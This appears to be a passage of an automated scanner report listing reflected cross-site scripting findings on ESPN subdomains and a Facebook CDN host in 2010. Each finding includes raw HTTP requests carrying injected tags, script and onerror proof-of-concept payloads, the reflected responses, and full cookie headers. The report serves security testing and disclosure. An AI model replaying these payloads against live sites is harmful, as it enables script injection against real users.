GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT Content-Length: 81827 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT Content-Length: 82134 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1"> ...[SNIP]...
5.118. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/660/united-states
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT Content-Length: 82242 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:19 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT Content-Length: 81915 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay"> ...[SNIP]...
5.120. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/6757/serbia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT Content-Length: 82015 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab3f<script>alert(1)</script>2f1f80457b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /keyword/searchcab3f<script>alert(1)</script>2f1f80457b3 HTTP/1.1 Host: sports.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289019231610; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; AcceptCookies=yes; CRBLM=CBLM-001:; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 136 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/keyword/searchcab3f<script>alert(1)</script>2f1f80457b3</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 was submitted in the REST URL parameter 3. This input was echoed as f5fd1<img src=a onerror=alert(1)>6deddee5e17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /connect.php/js/FB.Sharef5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 X-Cnection: close Expires: Sat, 06 Nov 2010 17:21:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 06 Nov 2010 17:21:15 GMT Content-Length: 88 Connection: close
/* "FB.Sharef5fd1<img src=a onerror=alert(1)>6deddee5e17" is not a valid component. */
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ceec<script>alert(1)</script>05c8d5071b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 101c7<script>alert(1)</script>0c34eaeab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en101c7<script>alert(1)</script>0c34eaeab34/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 128 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en101c7<script>alert(1)</script>0c34eaeab34/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebfd3<script>alert(1)</script>d621151af8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enebfd3<script>alert(1)</script>d621151af8a/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; 